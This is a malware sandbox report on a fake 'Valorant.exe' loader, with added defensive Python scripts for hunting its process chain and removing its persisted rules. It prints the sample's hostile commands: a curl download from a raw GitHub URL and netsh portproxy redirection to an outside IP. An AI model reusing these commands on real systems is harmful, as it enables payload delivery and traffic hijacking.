File name: Valorant.exe
Full analysis: https://app.any.run/tasks/40a6e1df-4f97-4a15-9860-d2eeaa88b844
Verdict: Malicious activity
Analysis date: May 28, 2025, 00:53:40
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: github, autoit
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5: FF41819A89FAAEE4046C10D630507B8E
SHA1: 31615B8B365D841542B7CB91F86097594B9ECD0D
SHA256: 765AE47DAE2CF68920E67813CB9FC0273736AC4CFDAE3571CDA856A3DAFE6568
SSDEEP: 98304:o9rem5OidboF7ToaQTD+/MiG3wAOLcn4Ob7J7Evj8I8mdTC3jaGHB/93X36XUPB8:mhZ4+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts NET.EXE for service management

      • cmd.exe (PID: 5332)
      • net.exe (PID: 5072)
      • cmd.exe (PID: 7444)
      • net.exe (PID: 7500)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • Valorant.exe (PID: 2136)
      • cmd.exe (PID: 3240)
    • Execution of CURL command

      • Valorant.exe (PID: 2136)
      • cmd.exe (PID: 3240)
    • Suspicious use of NETSH.EXE

      • cmd.exe (PID: 7980)
      • cmd.exe (PID: 8088)
    • Uses NETSH.EXE to redirect traffic

      • cmd.exe (PID: 7196)
      • cmd.exe (PID: 4608)
    • Process uses IPCONFIG to clear DNS cache

      • cmd.exe (PID: 4560)
    • There is functionality for taking screenshot (YARA)

      • Valorant.exe (PID: 2136)
    • Executable content was dropped or overwritten

      • Valorant.exe (PID: 2136)
    • Executing commands from a ".bat" file

      • Valorant.exe (PID: 2136)
    • Application launched itself

      • cmd.exe (PID: 3240)
  • INFO

    • Checks supported languages

      • Valorant.exe (PID: 2136)
      • curl.exe (PID: 7908)
      • curl.exe (PID: 6324)
    • Reads mouse settings

      • Valorant.exe (PID: 2136)
    • Execution of CURL command

      • cmd.exe (PID: 7812)
      • cmd.exe (PID: 672)
    • Reads the computer name

      • curl.exe (PID: 7908)
      • curl.exe (PID: 6324)
    • Disables trace logs

      • netsh.exe (PID: 8036)
      • netsh.exe (PID: 8144)
      • netsh.exe (PID: 5036)
      • netsh.exe (PID: 6644)
    • Create files in a temporary directory

      • Valorant.exe (PID: 2136)
    • The process uses AutoIt

      • Valorant.exe (PID: 2136)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic Win/DOS Executable (50)
.exe | DOS Executable Generic (49.9)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:05:22 01:06:37+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.16
CodeSize: 734208
InitializedDataSize: 2636288
UninitializedDataSize: -
EntryPoint: 0x2549c
OSVersion: 5.2
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
No data.
All screenshots are available in the full report
Total processes
164
Monitored processes
34
Malicious processes
1
Suspicious processes
2

Behavior graph

Process nodes in start order (the report marks a node "no specs" when no indicator is attached to it):
start; valorant.exe; cmd.exe (no specs); conhost.exe (no specs); net.exe (no specs); net1.exe (no specs); sppextcomobj.exe (no specs); slui.exe (no specs); cmd.exe (no specs); conhost.exe (no specs); net.exe (no specs); net1.exe (no specs); cmd.exe (no specs); conhost.exe (no specs); curl.exe; cmd.exe (no specs); conhost.exe (no specs); netsh.exe (no specs); cmd.exe (no specs); conhost.exe (no specs); netsh.exe (no specs); cmd.exe (no specs); conhost.exe (no specs); netsh.exe (no specs); cmd.exe (no specs); conhost.exe (no specs); netsh.exe (no specs); cmd.exe (no specs); conhost.exe (no specs); ipconfig.exe (no specs); cmd.exe (no specs); conhost.exe (no specs); cmd.exe (no specs); curl.exe; valorant.exe (no specs)

Process information

Columns per entry: PID, CMD, Path, Indicators, Parent process
PID: 672
CMD: C:\WINDOWS\system32\cmd.exe /c curl -s https://raw.githubusercontent.com/cometomehoney/nubshowbub/refs/heads/main/lick
Path: C:\Windows\System32\cmd.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
PID: 1324
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2100
CMD: "C:\Users\admin\AppData\Local\Temp\Valorant.exe"
Path: C:\Users\admin\AppData\Local\Temp\Valorant.exe
Parent process: explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED: this medium-integrity launch loaded only ntdll.dll and aborted; PID 2136 below is the same image started again from explorer.exe at HIGH integrity, i.e. the UAC-elevated relaunch)
Modules
Images
c:\users\admin\appdata\local\temp\valorant.exe
c:\windows\system32\ntdll.dll
PID: 2136
CMD: "C:\Users\admin\AppData\Local\Temp\Valorant.exe"
Path: C:\Users\admin\AppData\Local\Temp\Valorant.exe
Parent process: explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\valorant.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\psapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\gdi32.dll
PID: 2392
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3240
CMD: C:\WINDOWS\system32\cmd.exe /c C:\Users\admin\AppData\Local\Temp\a.bat
Path: C:\Windows\System32\cmd.exe
Parent process: Valorant.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
PID: 4560
CMD: C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\system32\ipconfig /flushdns
Path: C:\Windows\System32\cmd.exe
Parent process: Valorant.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
PID: 4608
CMD: C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\system32\netsh interface portproxy add v4tov4 listenport=80 listenaddress=0.0.0.0 connectport=80 connectaddress=13.201.124.126
Path: C:\Windows\System32\cmd.exe
Parent process: Valorant.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
PID: 4988
CMD: C:\WINDOWS\system32\ipconfig /flushdns
Path: C:\Windows\System32\ipconfig.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
IP Configuration Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ipconfig.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\dhcpcsvc.dll
PID: 5036
CMD: C:\WINDOWS\system32\netsh interface portproxy add v4tov4 listenport=3845 listenaddress=0.0.0.0 connectport=3845 connectaddress=13.201.124.126
Path: C:\Windows\System32\netsh.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Network Command Shell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
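The process chain above (the sample relaunching itself elevated, cmd.exe running a.bat from Temp, curl pulling a file from raw.githubusercontent.com, ipconfig /flushdns, and two netsh portproxy rules pointing at 13.201.124.126) is the kind of sequence a detection engineer wants to catch from process-creation telemetry rather than from a sandbox. The script below is an added example, not ANY.RUN tooling: it parses netsh portproxy command lines into rules, flags the other steps, and pairs the STATUS_ELEVATION_REQUIRED exit of PID 2100 with the high-integrity PID 2136 to report the elevation relaunch. The EVENTS records are constructed from the Process information section; the Sysmon-like field names are an assumption.

```python
"""Hunt for the process chain this report records: netsh portproxy redirection,
DNS cache flush, curl from raw GitHub, a batch script run from %TEMP%, and the
UAC-elevated relaunch of the sample.  Added example, not ANY.RUN tooling."""
import re
from collections import defaultdict

STATUS_ELEVATION_REQUIRED = 0xC000042C  # decimal 3221226540, the exit code of PID 2100

PORTPROXY_RE = re.compile(
    r"netsh(?:\.exe)?\s+interface\s+portproxy\s+add\s+(v[46]tov[46])\s+(.+)", re.I)
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
TEMP_BAT_RE = re.compile(
    r'cmd(?:\.exe)?\s+/c\s+"?([^"\s]*\\AppData\\Local\\Temp\\[^"\s]+\.bat)', re.I)

# Constructed records in start order, transcribed from the Process information
# section above; the Sysmon-like field names are an assumption.
TEMP_EXE = r"C:\Users\admin\AppData\Local\Temp\Valorant.exe"
EVENTS = [
    {"pid": 2100, "image": TEMP_EXE, "cmd": f'"{TEMP_EXE}"', "parent": "explorer.exe",
     "integrity": "MEDIUM", "exit": 3221226540},
    {"pid": 2136, "image": TEMP_EXE, "cmd": f'"{TEMP_EXE}"', "parent": "explorer.exe",
     "integrity": "HIGH", "exit": 0},
    {"pid": 3240, "image": r"C:\Windows\System32\cmd.exe", "parent": "Valorant.exe",
     "integrity": "HIGH", "exit": None,
     "cmd": r"C:\WINDOWS\system32\cmd.exe /c C:\Users\admin\AppData\Local\Temp\a.bat"},
    {"pid": 672, "image": r"C:\Windows\System32\cmd.exe", "parent": "cmd.exe",
     "integrity": "HIGH", "exit": 0,
     "cmd": "C:\\WINDOWS\\system32\\cmd.exe /c curl -s "
            "https://raw.githubusercontent.com/cometomehoney/nubshowbub/refs/heads/main/lick"},
    {"pid": 4988, "image": r"C:\Windows\System32\ipconfig.exe", "parent": "cmd.exe",
     "integrity": "HIGH", "exit": 0, "cmd": r"C:\WINDOWS\system32\ipconfig /flushdns"},
    {"pid": 5036, "image": r"C:\Windows\System32\netsh.exe", "parent": "cmd.exe",
     "integrity": "HIGH", "exit": 0,
     "cmd": "C:\\WINDOWS\\system32\\netsh interface portproxy add v4tov4 listenport=3845 "
            "listenaddress=0.0.0.0 connectport=3845 connectaddress=13.201.124.126"},
    {"pid": 6644, "image": r"C:\Windows\System32\netsh.exe", "parent": "cmd.exe",
     "integrity": "HIGH", "exit": 0,
     "cmd": "C:\\WINDOWS\\system32\\netsh interface portproxy add v4tov4 listenport=80 "
            "listenaddress=0.0.0.0 connectport=80 connectaddress=13.201.124.126"},
]


def parse_portproxy(cmd):
    """Return the rule a 'netsh interface portproxy add' command installs, else None."""
    m = PORTPROXY_RE.search(cmd)
    if not m:
        return None
    kv = {}
    for tok in m.group(2).split():
        if "=" in tok:
            k, v = tok.split("=", 1)
            kv[k.lower()] = v
    listen_port = kv.get("listenport", "?")
    return {
        "family": m.group(1).lower(),
        "listen": f"{kv.get('listenaddress', '*')}:{listen_port}",
        # netsh uses listenport as the connect port when connectport is omitted
        "connect": f"{kv.get('connectaddress', '?')}:{kv.get('connectport', listen_port)}",
    }


def analyze(events):
    """Return findings and extracted IOCs for a list of process-creation records."""
    findings, rules, urls = [], [], []
    launches = defaultdict(list)  # (image, parent) -> launches in start order
    for e in events:
        cmd, pid = e["cmd"], e["pid"]
        rule = parse_portproxy(cmd)
        if rule:
            rules.append(rule)
            findings.append(f"portproxy {rule['listen']} -> {rule['connect']} (pid {pid})")
        if re.search(r"ipconfig(?:\.exe)?\s+/flushdns", cmd, re.I):
            findings.append(f"dns cache flush (pid {pid})")
        if re.search(r"\bcurl(?:\.exe)?\s", cmd, re.I):
            for url in URL_RE.findall(cmd):
                urls.append(url)
                findings.append(f"curl download {url} (pid {pid})")
        m = TEMP_BAT_RE.search(cmd)
        if m:
            findings.append(f"batch script run from Temp: {m.group(1)} (pid {pid})")
        launches[(e["image"].lower(), e["parent"].lower())].append(e)
    # Same image and parent, one run ending in STATUS_ELEVATION_REQUIRED and a
    # later high-integrity run: the pattern of PIDs 2100 and 2136 above.
    for (image, _parent), runs in launches.items():
        failed = [r for r in runs if r["exit"] == STATUS_ELEVATION_REQUIRED]
        elevated = [r for r in runs
                    if r["integrity"] == "HIGH" and r["exit"] != STATUS_ELEVATION_REQUIRED]
        if failed and elevated:
            findings.append(f"elevation relaunch of {image}: "
                            f"pid {failed[0]['pid']} -> pid {elevated[0]['pid']}")
    return {"findings": findings, "portproxy": rules, "urls": urls}


if __name__ == "__main__":
    for line in analyze(EVENTS)["findings"]:
        print(line)
```

Sysmon event ID 1 or Windows security event 4688 (with command-line auditing enabled) supply records of this shape on a real host. Each step alone is noisy (administrators do run netsh portproxy and ipconfig /flushdns), so the value is in the combination within one process tree, and in extracting the listen and connect endpoints as IOCs rather than just alerting on the binary name.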
Total events
2 517
Read events
2 514
Write events
3
Delete events
0

Modification events

PID 8036 (netsh.exe)
Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{b23260c0-3cb4-11e8-bcf7-806e6f6e6963}
Operation: write
Name: NameServer
Value: (empty in the report)

PID 5036 (netsh.exe)
Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp
Operation: write
Name: 0.0.0.0/3845
Value: 13.201.124.126/3845

PID 6644 (netsh.exe)
Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp
Operation: write
Name: 0.0.0.0/80
Value: 13.201.124.126/80

Note: the two PortProxy values are the persisted form of the netsh portproxy rules (value name = listen address/port, data = connect address/port). They survive a reboot and are applied by the IP Helper service, so removing the running process does not remove the redirection. No connection to 13.201.124.126 is recorded anywhere in this session.
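Because the portproxy rules live in the registry rather than in the process, an incident responder working from an offline hive or a reg export needs to recover them from that key and produce the matching removal commands. The script below is an added example, not ANY.RUN tooling: it parses a .reg export, lists the v4tov4 rules and any per-interface NameServer override, and emits the netsh delete commands. REG_EXPORT is constructed to reproduce the three writes recorded above; only REG_SZ values are handled.

```python
"""Recover netsh portproxy rules and per-interface DNS overrides from a .reg
export and generate removal commands.  Added example, not ANY.RUN tooling."""
import re

# Constructed .reg text reproducing the three registry writes in this report.
REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PortProxy\v4tov4\tcp]
"0.0.0.0/3845"="13.201.124.126/3845"
"0.0.0.0/80"="13.201.124.126/80"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{b23260c0-3cb4-11e8-bcf7-806e6f6e6963}]
"NameServer"=""
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]*)"="((?:[^"\\]|\\.)*)"$')  # REG_SZ entries only
PORTPROXY_KEY_RE = re.compile(r"\\Services\\PortProxy\\(v[46]tov[46])\\tcp$", re.I)
IFACE_KEY_RE = re.compile(r"\\Tcpip\\Parameters\\Interfaces\\(\{[0-9a-f-]+\})$", re.I)


def parse_reg(text):
    r"""Minimal .reg parser: {key_path: {value_name: data}} for REG_SZ values."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            # .reg escapes backslashes and quotes inside string data
            keys[current][m.group(1)] = m.group(2).replace('\\"', '"').replace("\\\\", "\\")
    return keys


def portproxy_rules(keys):
    r"""Values under PortProxy\<family>\tcp are 'listenaddr/listenport' = 'connectaddr/connectport'."""
    rules = []
    for path, values in keys.items():
        m = PORTPROXY_KEY_RE.search(path)
        if not m:
            continue
        for name, data in values.items():
            laddr, lport = name.rsplit("/", 1)
            caddr, cport = data.rsplit("/", 1)
            rules.append({"family": m.group(1).lower(),
                          "listen_addr": laddr, "listen_port": int(lport),
                          "connect_addr": caddr, "connect_port": int(cport)})
    return rules


def removal_commands(rules):
    """netsh deletes a portproxy rule by its listen side only."""
    return [f"netsh interface portproxy delete {r['family']} "
            f"listenport={r['listen_port']} listenaddress={r['listen_addr']}" for r in rules]


def dns_overrides(keys):
    r"""(interface GUID, NameServer) pairs written under Tcpip\Parameters\Interfaces."""
    out = []
    for path, values in keys.items():
        m = IFACE_KEY_RE.search(path)
        if m and "NameServer" in values:
            out.append((m.group(1), values["NameServer"]))
    return out


if __name__ == "__main__":
    parsed = parse_reg(REG_EXPORT)
    for rule in portproxy_rules(parsed):
        print(f"{rule['listen_addr']}:{rule['listen_port']} -> "
              f"{rule['connect_addr']}:{rule['connect_port']}")
    for cmd in removal_commands(portproxy_rules(parsed)):
        print(cmd)
    for guid, ns in dns_overrides(parsed):
        print(f"interface {guid} NameServer={ns!r}")
```

On a live host the same data comes from `netsh interface portproxy show all`, and `reg export HKLM\SYSTEM\CurrentControlSet\Services\PortProxy portproxy.reg` produces input in this format. An empty NameServer string means no static DNS server is set for that interface; the report shows the value as empty, so the script reports it rather than interpreting it.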
Executable files
1
Suspicious files
2
Text files
1
Unknown types
0

Dropped files

Columns: PID, Process, Filename, Type

PID 2136 | Valorant.exe | C:\Users\admin\AppData\Local\Temp\a.bat | text
MD5: 41341C0B43BA77303B55A40F6EE6A5EA
SHA256: F5FA5363E7F2B9A31DDFC2D06DA98D8BAE34548E2D597759927AF595BA270CE6

PID 2136 | Valorant.exe | C:\Users\admin\AppData\Local\Temp\Loader[100.0.3]GLOBAL.exe | executable
MD5: 7FC9D9BBE2DA7CAE99767D24F29EB431
SHA256: 4BDCD22DA2B1F8BBFE71F0B9020A58B933109B303B033679E0597DF697BD1F12

PID 2136 | Valorant.exe | C:\Users\admin\AppData\Local\Temp\autD370.tmp | binary
MD5: 7DFD04CBED1A248829F95DD234F37A4E
SHA256: DBD96ADE57017DAAD6099CB84D124966311B5015636964788F57FB5B5909D938

PID 2136 | Valorant.exe | C:\Users\admin\AppData\Local\Temp\autD275.tmp | binary
MD5: 8D9F7C733B198D1AA9DC477D1D4D27B3
SHA256: 18601EF928233494BD0FAAD1DAADD6A0D75ED791AC0E3563441F30B4A3530A1A

Note: a.bat is the script executed by cmd.exe PID 3240; the aut*.tmp names are consistent with AutoIt's FileInstall extracting embedded payloads, matching the "The process uses AutoIt" signature above.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
27
DNS requests
17
Threats
2

HTTP requests

Columns: PID, Process, Method, HTTP code, IP, URL, CN, Reputation (Type and Size are empty for every row; a row marked "same process" continues the PID above it)

PID 5496 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.166:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | CN: unknown | whitelisted
(same process) | GET | 200 | 23.48.23.166:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | CN: unknown | whitelisted
PID 5496 | MoUsoCoreWorker.exe | GET | 200 | 2.23.181.156:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | CN: unknown | whitelisted
(same process) | GET | 200 | 2.23.181.156:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | CN: unknown | whitelisted
PID 6544 | svchost.exe | GET | 200 | 23.63.118.230:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | CN: unknown | whitelisted
PID 756 | lsass.exe | GET | 200 | 104.18.38.233:80 | http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D | CN: unknown | whitelisted
PID 7364 | SIHClient.exe | GET | 200 | 2.23.181.156:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | CN: unknown | whitelisted
PID 756 | lsass.exe | GET | 200 | 172.64.149.23:80 | http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEH1bUSa0droR23QWC7xTDac%3D | CN: unknown | whitelisted
PID 7364 | SIHClient.exe | GET | 200 | 2.23.181.156:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | CN: unknown | whitelisted

All nine decoded HTTP requests are Windows CRL/OCSP background traffic from system processes; none originate from the sample or from curl.exe, whose fetch is over TLS and appears only in the Connections table.

Connections

Columns: PID, Process, IP, Domain, ASN, CN, Reputation (a row marked "same process" continues the PID above it)

(PID not shown) | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
PID 4 | System | 192.168.100.255:137 | whitelisted
PID 5496 | MoUsoCoreWorker.exe | 23.48.23.166:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
(same process) | 23.48.23.166:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
PID 5496 | MoUsoCoreWorker.exe | 2.23.181.156:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
(same process) | 2.23.181.156:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
PID 4 | System | 192.168.100.255:138 | whitelisted
PID 6544 | svchost.exe | 20.190.159.0:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
PID 7908 | curl.exe | 185.199.111.133:443 | raw.githubusercontent.com | FASTLY | US | whitelisted
PID 6544 | svchost.exe | 23.63.118.230:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted

Note: the only sample-related connection is curl.exe (PID 7908) to raw.githubusercontent.com on 443; because it is TLS, the fetched content is not decoded in the HTTP requests table and the PCAP is needed to see more. No connection to 13.201.124.126, the portproxy target, occurs in this session, so nothing reached the listening ports 80 and 3845 while the sandbox ran.

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
whitelisted
google.com
  • 142.250.184.238
whitelisted
crl.microsoft.com
  • 23.48.23.166
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 2.23.181.156
whitelisted
login.live.com
  • 20.190.159.0
  • 40.126.31.71
  • 20.190.159.71
  • 40.126.31.2
  • 20.190.159.75
  • 20.190.159.73
  • 40.126.31.3
  • 40.126.31.129
whitelisted
raw.githubusercontent.com
  • 185.199.111.133
  • 185.199.108.133
  • 185.199.110.133
  • 185.199.109.133
whitelisted
ocsp.digicert.com
  • 23.63.118.230
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
ocsp.comodoca.com
  • 104.18.38.233
  • 172.64.149.23
whitelisted
ocsp.usertrust.com
  • 172.64.149.23
  • 104.18.38.233
whitelisted

Threats

Columns: PID, Process, Class, Message

PID 2196 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Attempting to access raw user content on GitHub
PID 2196 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Attempting to access raw user content on GitHub
No debug info